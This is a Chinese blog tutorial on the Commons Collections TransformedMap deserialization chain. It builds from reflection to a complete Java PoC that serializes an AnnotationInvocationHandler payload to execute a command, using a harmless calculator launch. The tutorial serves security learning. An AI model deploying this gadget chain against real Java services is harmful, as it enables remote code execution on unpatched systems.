transform TransformedMap利用链

最新推荐文章于 2022-10-28 11:50:43 发布
最新推荐文章于 2022-10-28 11:50:43 发布
阅读量574 收藏 1
点赞数 1
分类专栏: 安全 文章标签: transform 反射
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34101364/article/details/113096002
版权

引入环境:

<dependency>
    <groupId>org.apache.commons</groupId>
    <artifactId>commons-collections4</artifactId>
    <version>4.0</version>
</dependency>

<dependency>
    <groupId>commons-collections</groupId>
    <artifactId>commons-collections</artifactId>
    <version>3.1</version>
</dependency>

首先看看通过反射调用命令执行的poc

public static void test01() throws ClassNotFoundException, NoSuchMethodException, InvocationTargetException, IllegalAccessException {
        Object runtime=Class.forName("java.lang.Runtime")
                .getMethod("getRuntime",new Class[]{})
                .invoke(null);

        Class.forName("java.lang.Runtime")
                .getMethod("exec", String.class)
                .invoke(runtime,"open /System/Applications/Calculator.app");
    }

这种方式的调用流程如下

1、首选通过类名进行反射

Class<?> cF = Class.forName("com.example.deviceinfodemo.ForNameClass");

2、接着,实例化该类

forNameClass = (ForNameClass) cF.newInstance();

3、最后就是获取非静态方法,并通过invoke调用该方法,invoke参数为实例化对象和目标方法参数

Method aMethod = cF.getMethod("get", String.class);
aMethod.invoke(forNameClass, "str arg");

对于静态方法,则不需要实例化对象:

Class<?> cF = Class.forName("com.example.deviceinfodemo.ForNameClass");
Method staticMethod = cF.getMethod("staticMethod");
staticMethod.invoke("str arg");

InvokerTransformer反射链

先看一下如何使用InvokerTransformer实现反射链

    public static void transformChaim(){
        InvokerTransformer tran = new InvokerTransformer("getMethod",
                new Class[]{String.class, Class[].class},
                new Object[]{"getRuntime", null});
        Method method = (Method) tran.transform(Runtime.class);

        InvokerTransformer tran2 = new InvokerTransformer("invoke",
                new Class[]{Object.class, Object[].class},
                new Object[]{null, null});
        Runtime run = (Runtime) tran2.transform(method);

        InvokerTransformer tran3 = new InvokerTransformer("exec",
                new Class[]{String.class},
                new Object[]{"open /System/Applications/Calculator.app"});
        System.out.println(tran3.transform(run).toString());
    }

来看看InvokerTransformer类为什么能做这些,如下代码所示,首先InvokerTransformer通过构造函数对相应值进行赋值,然后通过transform函数实现反射调用

// InvokerTransformer源码
	public InvokerTransformer(String methodName, Class[] paramTypes, Object[] args) {
        this.iMethodName = methodName;
        this.iParamTypes = paramTypes;
        this.iArgs = args;
    }

    public Object transform(Object input) {
        if (input == null) {
            return null;
        } else {
            try {
                Class cls = input.getClass();
                Method method = cls.getMethod(this.iMethodName, this.iParamTypes);
                return method.invoke(input, this.iArgs);
            } catch (NoSuchMethodException var5) {
                throw new FunctorException("InvokerTransformer: The method '" + this.iMethodName + "' on '" + input.getClass() + "' does not exist");
            } catch (IllegalAccessException var6) {
                throw new FunctorException("InvokerTransformer: The method '" + this.iMethodName + "' on '" + input.getClass() + "' cannot be accessed");
            } catch (InvocationTargetException var7) {
                throw new FunctorException("InvokerTransformer: The method '" + this.iMethodName + "' on '" + input.getClass() + "' threw an exception", var7);
            }
        }
    }

ChainedTransformer反射链

先上poc:

public static void myChainedTransformer(){
        ChainedTransformer chain = null;
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"open /System/Applications/Calculator.app"})};
        chain = new ChainedTransformer(transformers);
        chain.transform(Object.class);
    }

分析一下ChainedTransformer,首先通过构造函数获取数组transformers,然后调用transform函数,该函数会循环获取数组transformers中的值,通过调用transform来实现真正的反射调用。

// ChainedTransformer源码
	public ChainedTransformer(Transformer[] transformers) {
        this.iTransformers = transformers;
    }

    public Object transform(Object object) {
        for(int i = 0; i < this.iTransformers.length; ++i) {
            object = this.iTransformers[i].transform(object);
        }

        return object;
    }

TransformedMap反射链

前面的代码最后都直接调用了transform函数,来看一个不直接调用的(间接调用),TransformedMap类符合这个条件:

    public static void  myTransformedMap(){
        ChainedTransformer chained = null;
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"open /System/Applications/Calculator.app"})};
        chained = new ChainedTransformer(transformers);
        Map m = new HashMap();
        m.put("key", "value"); // 参数不重要,剧情需要
        Map map = TransformedMap.decorate(m,null,chained);
        Map.Entry entry = (Map.Entry) map.entrySet().iterator().next(); // 转换为集合类型,并通过迭代器获取第一组值
        entry.setValue(Object.class); // 参数不重要,剧情需要
    }

来分析一下TransformedMap源码

decorate函数主要起到赋值作用

// TransformedMap源码
    public static Map decorate(Map map, Transformer keyTransformer, Transformer valueTransformer) {
        return new TransformedMap(map, keyTransformer, valueTransformer);
    }

    protected TransformedMap(Map map, Transformer keyTransformer, Transformer valueTransformer) {
        super(map);
        this.keyTransformer = keyTransformer;
        this.valueTransformer = valueTransformer;
    }

跟进setValue函数,发现调用了checkSetValue函数,跟进

        public Object setValue(Object value) {
            value = this.parent.checkSetValue(value);
            return super.entry.setValue(value);
        }

然后就发现了transform函数,继续跟进:

    protected Object checkSetValue(Object value) {
        return this.valueTransformer.transform(value);
    }

然后就跟ChainedTransformer反射链一样了:

    public Object transform(Object object) {
        for(int i = 0; i < this.iTransformers.length; ++i) {
            object = this.iTransformers[i].transform(object);
        }

        return object;
    }

例子🌰

这里举一个使用这个链和java反序列化实现rce的栗子。

如果一个java应用没有对传入的序列化数据进行安全检查,我们可以将恶意的TransformedMap反射链序列化后,远程提交给相关应用,通过某些操作进行触发执行。

在进行反序列化时候,通常会调用ObjectInputStrem类的readObject函数,如果恶意类重写了readObject函数,那么该类进行反序列化时,java会主动调用readObject方法。

因此如果某个可序列化的类重写了readObject方法,并且在readObject中对map类型的变量进行了键值修改操作,并且这个map变量可控,就可以作为我们TransformedMap反射链的攻击载体了。

于是找到了sun.reflect.annotation.AnnotationInvocationHandler类,它的readobject函数如下:

private void readObject(ObjectInputStream var1) throws IOException, ClassNotFoundException {
        var1.defaultReadObject();
        AnnotationType var2 = null;

        try {
            var2 = AnnotationType.getInstance(this.type);
        } catch (IllegalArgumentException var9) {
            throw new InvalidObjectException("Non-annotation type in annotation serial stream");
        }

        Map var3 = var2.memberTypes();
        Iterator var4 = this.memberValues.entrySet().iterator();

        while(var4.hasNext()) {
            Entry var5 = (Entry)var4.next();
            String var6 = (String)var5.getKey();
            Class var7 = (Class)var3.get(var6);
            if (var7 != null) {
                Object var8 = var5.getValue();
                if (!var7.isInstance(var8) && !(var8 instanceof ExceptionProxy)) {
                    var5.setValue((new AnnotationTypeMismatchExceptionProxy(var8.getClass() + "[" + var8 + "]")).setMember((Method)var2.members().get(var6)));
                }
            }
        }

    }

poc如下,该poc需要较老的jdk版本才能用,不用过多实践,这里只是作为一个例子说明:

package classLoaderTest;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.map.HashedMap;
import org.apache.commons.collections.map.TransformedMap;
import org.apache.commons.io.output.ByteArrayOutputStream;


import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Constructor;
import java.util.Map;

public class CommonCollectionsPlayLoad {

    public static void main(String[] args) throws Exception {
        new CommonCollectionsPlayLoad().run();
    }

    public void run() throws Exception {
        deserialize(serialize(getObject()));
    }

    //在此方法中返回恶意对象
    public Object getObject() throws Exception {
        //构建恶意代码
        final Transformer[] transformers = new Transformer[] {
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"open /System/Applications/Calculator.app"})};
        Transformer transformer=new ChainedTransformer(transformers);

        //将恶意代码包装到目标的 sun.reflect.annotation.AnnotationInvocationHandler 中
        /**
         * 构建一个 transformedMap ,
         * transformedMap的作用是包装一个Map对象,使得每一次在该Map中的Entry进行setValue的时候
         * 都会触发 transformer的transform()方法
         * */
        Map transformedMap=TransformedMap.decorate(new HashedMap(),null,transformer);
        //由于AnnotationInvocationHandler无法直接访问,因此使用反射的方式来构建对象
        final Constructor<?> constructor = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler").getDeclaredConstructors()[0];
        constructor.setAccessible(true);
        return constructor.newInstance(Override.class, transformedMap);
    }

    public byte[] serialize(final Object obj) throws IOException {
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        ObjectOutputStream objOut = new ObjectOutputStream(out);
        objOut.writeObject(obj);
        return out.toByteArray();
    }

    public Object deserialize(final byte[] serialized) throws IOException, ClassNotFoundException {
        ByteArrayInputStream in = new ByteArrayInputStream(serialized);
        ObjectInputStream objIn = new ObjectInputStream(in);
        return objIn.readObject();
    }
}

参考:
https://www.freebuf.com/vuls/170344.html

5wimming
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
java安全(七) 反序列化3 CC利用 TransformedMap版
weixin_45694388的博客
04-21 3414
给个关注?宝儿! 给个关注?宝儿! 给个关注?宝儿! 关注公众号:b1gpig信息安全,文章推送不错过 众所周知,CommonCollections利⽤是作为反序列化学习不可绕i过的一关 图解 先挂一张wh1te8ea的利用图解,非常直观! 代码demo 分析: 代码使用了phith0n大佬的代码,对原本复杂的源码进行了优化,适合复现以及更加深刻理解 demo代码: package test.org.vulhub.Ser; import org.apache.commons.collecti.
VB利用transform分析数据
05-18
摘要:VB源码,数据库应用,数据查询 VB利用transform分析查询数据,只适合Access数据库。通过按语言类别统计,按库存图书统计两种方式展现transform分析数据的能力,源码较简单,适合VB新手学习参考。
Apache commons-collections反序列化漏洞(TransformedMap利用)
qq_43936524的博客
04-10 464
文章目录Commons-collections概述InvokerTransformer反射触发ChainedTransformer遍历触发封装为TransformedMap寻找ReadObject触发点AnnotationInvocationHandler触发(JDK1.7)BadAttributeValueExpException(JDK1.8) Commons-collections概述 官网对Commons-collections的说明 Java commons-collections是JDK 1.
[Java安全]CommonCollections1_TransformedMap
cosmoslin的博客
03-08 676
CommonCollections1_TransformedMap 本机环境: JDK版本:jdk1.7u_51 CC版本:Commons-Collections 3.1 import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.Const
java 反序列化CC1分析(TransformedMap)
wsitcj的博客
03-14 1423
Map类 --> TransformedMap Map类是存储键值对的数据结构。 Apache Commons Collections中实现了TransformedMap ,该类可以在一个元素被添加/删除/或是被修改时会调用transform方法自动进行特定的修饰变换,具体的变换逻辑由Transformer类定义。也就是说,TransformedMap类中的数据发生改变时,可以自动对进行一些特殊的变换,比如在数据改变时,进行一些我们提前设定好的操作。 TransformedMap.decorate方法
java反序列化 - transformedMap类可以执行恶意代码的原理
weixin_34319111的博客
08-16 810
java反序列化 - transformedMap类可以执行恶意代码的原理 0x00 代码 Map map=new HashMap(); map.put("key","value"); //调用目标对象的toString方法 String command="calc.exe"; final String[] execArgs ...
Unity3d实时Transform面板
最新发布
10-07
Unity3D是一款强大的跨平台游戏开发引擎,广泛用于制作2D和3D游戏、互动体验以及虚拟现实应用。...无论是新手还是经验丰富的开发者,都应该充分理解和利用这个核心组件,以实现各种复杂的游戏逻辑和视觉效果。
利用CSS3的transform做的动态时钟效果
09-25
利用transform属性制作动态时钟效果时,我们首先需要了解transformtransform-origin两个属性的基本用法。 transform-origin属性是用来设置元素变换的原点的,即元素是以哪个点为基准进行旋转和倾斜操作的。它的...
css利用transform skewX制作平行四边形导航菜单
09-22
总结来说,利用 CSS 的 `transform: skewX()` 属性可以轻松制作平行四边形导航菜单,通过巧妙地使用嵌套元素或伪元素,可以在不影响内容可读性的前提下实现形状的倾斜。这个技术不仅适用于导航菜单,还可以广泛应用...
dct.rar_transform
09-14
离散余弦变换(DCT,Discrete Cosine Transform)是一种在数字信号处理领域广泛应用的数学变换技术,特别是在图像和音频压缩中,如JPEG、MPEG等标准中扮演着核心角色。标题“dct.rar_transform”暗示我们关注的是与...
Java代码审计——Commons Collections TransformedMap调用
王嘟嘟的博客
11-05 889
0x00 前言 CC最基础的就是迭代:Java代码审计——Commons Collections 迭代调用,核心就是 ChainedTransformerTransformer方法。那么TransformedMap就是可以调用此方法的一条。 0x01 TransformedMap调用 在CC包中, 有TransformedMap这样一个类,他在进行put,checkSetValue等方法时,可以触发transform方法,如下图所示。 1. 先上poc: Transformer[] trans
Java 反序列化漏洞-Apache Commons Collections1-TransformedMap 攻击
cjdgg的博客
02-08 2481
Java 反序列化漏洞-Apache Commons Collections前言前置知识TransformedMap 前言 前面已经学了一些Java反序列化漏洞的相关基础知识,今天就来学习分析一下Apache Commons Collections的反序列化漏洞 环境搭建推荐大家直接使用maven搭建,网上都有很多教程这里就不多说了 要寻找反序列化漏洞,最主要的是找到三个点: 入口点(kick-off),触发点(sink),调用(chain) 前置知识 TransformedMap org.apache.
java 序列化 反射_JAVA反序列化中的反射
weixin_42492000的博客
02-16 318
反射的构造看JAVA反序列化http://www.freebuf.com/news/150872.html构造反射Transformer类,源码解释为从一个类转化为另一个类。其中的transform()为执行转换方法。ConstantTransformer,invokerTransformer,ChainedTransformerTransformedMap继承了Transformer类...
CC1(TransformMap版)
..
10-09 817
借用闪烁之狐的介绍是Apache软件基金会的项目,曾经隶属于Jakarta项目。Commons的目的是提供可重用的、解决各种实际的通用问题且开源的Java代码。Commons由三部分组成:Proper(是一些已发布的项目)、Sandbox(是一些正在开发的项目)和Dormant(是一些刚启动或者已经停止维护的项目)。包为Java标准的Collections API提供了相当好的补充。在此基础上对其常用的数据结构操作进行了很好的封装、抽象和补充。
java反序列化CC1 Transformmap攻击--2022最新
weixin_49248030的博客
10-28 1058
java反序列化CC1 Transformmap攻击逆向反推,Java反序列化,CC1分析
.exp文件_UEditor编辑器任意文件上传漏洞分析
weixin_39939510的博客
11-27 249
更多全球网络安全资讯尽在邑安全ue下载地址http://http://ueditor.baidu.com/website/download.htmlexp<form action="http://192.168.1.103/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded" m...
【入坑JAVA安全】手把手教你写反序列化POC
一个安全研究员
04-15 1960
要是你是妹子就更好了~
Transform Map - Ignore Row if any fields are empty
weixin_34096182的博客
01-11 56
https://community.servicenow.com/thread/253728Hi Harry,Have this script in the onBefore transform scriptif(source.u_field1 == '' && source.u_field2 == '' && source.u_field...
MapUtil 转换成map的各种方法
qq_38490078的博客
02-03 2666
import com.alibaba.fastjson.JSON; import com.alibaba.fastjson.JSONObject; import org.apache.commons.beanutils.BeanUtils; import org.apache.commons.lang3.StringUtils; import java.util.HashMap; import...
CSS 利用transform达到居中效果
05-30
` 将子元素的左上角移动到父元素的中心位置,而 `transform: translate(-50%, -50%);` 则将子元素自身的中心位置移动回来,从而实现居中效果。需要注意的是,父元素需要设置为相对定位(`position: relative;`),否则...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值